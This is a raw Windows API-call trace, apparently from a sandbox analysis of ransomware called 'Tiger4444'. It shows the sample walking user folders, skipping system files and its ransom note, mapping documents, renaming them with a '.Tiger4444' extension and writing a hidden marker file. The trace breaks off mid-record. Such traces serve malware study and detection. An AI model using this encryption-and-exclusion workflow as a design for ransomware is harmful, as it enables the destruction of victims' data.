0xc612d8 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0047.201] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0047.202] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13865667879) returned 1 [0047.204] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0047.204] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0047.204] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.204] CloseHandle (hObject=0x2c8) returned 1 [0047.204] CloseHandle (hObject=0x260) returned 1 [0047.205] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\ArOyoOdOI6imJTOdUQz.docx.Tiger4444") returned 96 [0047.205] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\ArOyoOdOI6imJTOdUQz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\aroyoodoi6imjtoduqz.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\ArOyoOdOI6imJTOdUQz.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\aroyoodoi6imjtoduqz.docx.tiger4444"), dwFlags=0x1) returned 1 [0047.205] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=10656 | out: Addend=0xc6f980) returned 22600720 [0047.205] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4861 [0047.205] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82900580, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0x9a36e760, ftLastAccessTime.dwHighDateTime=0x1d4cc26, ftLastWriteTime.dwLowDateTime=0x9a36e760, ftLastWriteTime.dwHighDateTime=0x1d4cc26, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CV 4F8bU8BkzH0h", cAlternateFileName="CV4F8B~1")) returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="Tiger4444.exe") returned -1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2=".") returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="..") returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="windows") returned -1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="bootmgr") returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="pagefile.sys") returned -1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="boot") returned 1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="ids.txt") returned -1 [0047.206] lstrcmpiW (lpString1="CV 4F8bU8BkzH0h", lpString2="NTUSER.DAT") returned -1 [0047.206] lstrcpyW (in: lpString1=0x30aeb24, lpString2="CV 4F8bU8BkzH0h" | out: lpString1="CV 4F8bU8BkzH0h") returned="CV 4F8bU8BkzH0h" [0047.206] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0047.206] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9c) returned 0xc611e0 [0047.206] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66528 [0047.206] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dfb730, ftCreationTime.dwHighDateTime=0x1d4caa2, ftLastAccessTime.dwLowDateTime=0xe1cf4a50, ftLastAccessTime.dwHighDateTime=0x1d4cbfd, ftLastWriteTime.dwLowDateTime=0xe1cf4a50, ftLastWriteTime.dwHighDateTime=0x1d4cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x18663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FKzNXHAJ9H_X.rtf", cAlternateFileName="FKZNXH~1.RTF")) returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="Tiger4444.exe") returned -1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2=".") returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="..") returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="windows") returned -1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="bootmgr") returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="pagefile.sys") returned -1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="boot") returned 1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="ids.txt") returned -1 [0047.206] lstrcmpiW (lpString1="FKzNXHAJ9H_X.rtf", lpString2="NTUSER.DAT") returned -1 [0047.206] lstrcpyW (in: lpString1=0x30aeb24, lpString2="FKzNXHAJ9H_X.rtf" | out: lpString1="FKzNXHAJ9H_X.rtf") returned="FKzNXHAJ9H_X.rtf" [0047.206] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\FKzNXHAJ9H_X.rtf", dwFileAttributes=0x0) returned 1 [0047.206] lstrlenW (lpString="FKzNXHAJ9H_X.rtf") returned 16 [0047.206] lstrlenW (lpString="Tiger4444") returned 9 [0047.207] lstrcmpiW (lpString1="J9H_X.rtf", lpString2="Tiger4444") returned -1 [0047.207] lstrlenW (lpString=".dll") returned 4 [0047.207] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.207] lstrlenW (lpString=".lnk") returned 4 [0047.207] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.207] lstrlenW (lpString=".ini") returned 4 [0047.207] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.207] lstrlenW (lpString=".sys") returned 4 [0047.207] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0047.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\FKzNXHAJ9H_X.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\fkznxhaj9h_x.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.207] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.207] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13866006543) returned 1 [0047.207] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=99939) returned 1 [0047.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0047.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0047.207] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18970, lpName=0x0) returned 0x2c8 [0047.207] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18970) returned 0xbe0000 [0047.209] CryptAcquireContextW (in: phProv=0x30abb40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30abb40*=0xc72148) returned 1 [0047.210] CryptGenRandom (in: hProv=0xc72148, dwLen=0x80, pbBuffer=0x30abb5c | out: pbBuffer=0x30abb5c) returned 1 [0047.210] CryptReleaseContext (hProv=0xc72148, dwFlags=0x0) returned 1 [0047.210] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.210] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.210] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.210] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.210] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13866330664) returned 1 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0047.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0047.210] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.211] CloseHandle (hObject=0x2c8) returned 1 [0047.211] CloseHandle (hObject=0x260) returned 1 [0047.212] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\FKzNXHAJ9H_X.rtf.Tiger4444") returned 88 [0047.212] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\FKzNXHAJ9H_X.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\fkznxhaj9h_x.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\FKzNXHAJ9H_X.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\fkznxhaj9h_x.rtf.tiger4444"), dwFlags=0x1) returned 1 [0047.213] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=99952 | out: Addend=0xc6f980) returned 22611376 [0047.213] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4864 [0047.213] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dfb730, ftCreationTime.dwHighDateTime=0x1d4caa2, ftLastAccessTime.dwLowDateTime=0xe1cf4a50, ftLastAccessTime.dwHighDateTime=0x1d4cbfd, ftLastWriteTime.dwLowDateTime=0xe1cf4a50, ftLastWriteTime.dwHighDateTime=0x1d4cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x18663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FKzNXHAJ9H_X.rtf", cAlternateFileName="FKZNXH~1.RTF")) returned 0 [0047.213] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0047.213] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.213] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.213] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.214] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.214] CloseHandle (hObject=0x260) returned 1 [0047.214] CloseHandle (hObject=0x2ac) returned 1 [0047.214] GetCurrentThreadId () returned 0xfa8 [0047.214] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0047.214] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h" [0047.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0047.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0047.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h" [0047.214] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\" [0047.214] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\.BFC0E91B00AE8A0620D3" [0047.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.216] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.218] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.219] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.219] CloseHandle (hObject=0x2ac) returned 1 [0047.219] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h") returned 77 [0047.219] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.219] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82900580, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0x9a36e760, ftLastAccessTime.dwHighDateTime=0x1d4cc26, ftLastWriteTime.dwLowDateTime=0x812a4f5c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0047.220] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.220] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.220] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.220] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.220] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82900580, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0x9a36e760, ftLastAccessTime.dwHighDateTime=0x1d4cc26, ftLastWriteTime.dwLowDateTime=0x812a4f5c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.220] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.220] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.220] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.220] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.220] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.220] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x812a4f5c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x812a4f5c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x812a4f5c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.220] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.220] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.220] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x399625d0, ftCreationTime.dwHighDateTime=0x1d4c6a2, ftLastAccessTime.dwLowDateTime=0x6b264fe0, ftLastAccessTime.dwHighDateTime=0x1d4d295, ftLastWriteTime.dwLowDateTime=0x6b264fe0, ftLastWriteTime.dwHighDateTime=0x1d4d295, nFileSizeHigh=0x0, nFileSizeLow=0x2e61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I3HSL.pptx", cAlternateFileName="I3HSL~1.PPT")) returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="Tiger4444.exe") returned -1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2=".") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="..") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="windows") returned -1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="bootmgr") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="pagefile.sys") returned -1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="boot") returned 1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="ids.txt") returned -1 [0047.220] lstrcmpiW (lpString1="I3HSL.pptx", lpString2="NTUSER.DAT") returned -1 [0047.220] lstrcpyW (in: lpString1=0x30aeb44, lpString2="I3HSL.pptx" | out: lpString1="I3HSL.pptx") returned="I3HSL.pptx" [0047.220] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\I3HSL.pptx", dwFileAttributes=0x0) returned 1 [0047.220] lstrlenW (lpString="I3HSL.pptx") returned 10 [0047.220] lstrlenW (lpString="Tiger4444") returned 9 [0047.220] lstrcmpiW (lpString1="3HSL.pptx", lpString2="Tiger4444") returned -1 [0047.220] lstrlenW (lpString=".dll") returned 4 [0047.220] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0047.221] lstrlenW (lpString=".lnk") returned 4 [0047.221] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0047.221] lstrlenW (lpString=".ini") returned 4 [0047.221] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0047.221] lstrlenW (lpString=".sys") returned 4 [0047.221] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0047.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\I3HSL.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\i3hsl.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.221] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.221] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13867396530) returned 1 [0047.221] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=11873) returned 1 [0047.221] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0047.221] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0047.221] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3170, lpName=0x0) returned 0x2c8 [0047.221] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3170) returned 0xbe0000 [0047.222] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.222] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.222] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0047.222] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.222] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13867553049) returned 1 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0047.222] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0047.223] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.223] CloseHandle (hObject=0x2c8) returned 1 [0047.223] CloseHandle (hObject=0x260) returned 1 [0047.223] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\I3HSL.pptx.Tiger4444") returned 98 [0047.223] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\I3HSL.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\i3hsl.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\I3HSL.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\i3hsl.pptx.tiger4444"), dwFlags=0x1) returned 1 [0047.224] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=11888 | out: Addend=0xc6f980) returned 22711328 [0047.224] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4867 [0047.224] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb902a50, ftCreationTime.dwHighDateTime=0x1d4cbe1, ftLastAccessTime.dwLowDateTime=0xa44c87a0, ftLastAccessTime.dwHighDateTime=0x1d4d5db, ftLastWriteTime.dwLowDateTime=0xa44c87a0, 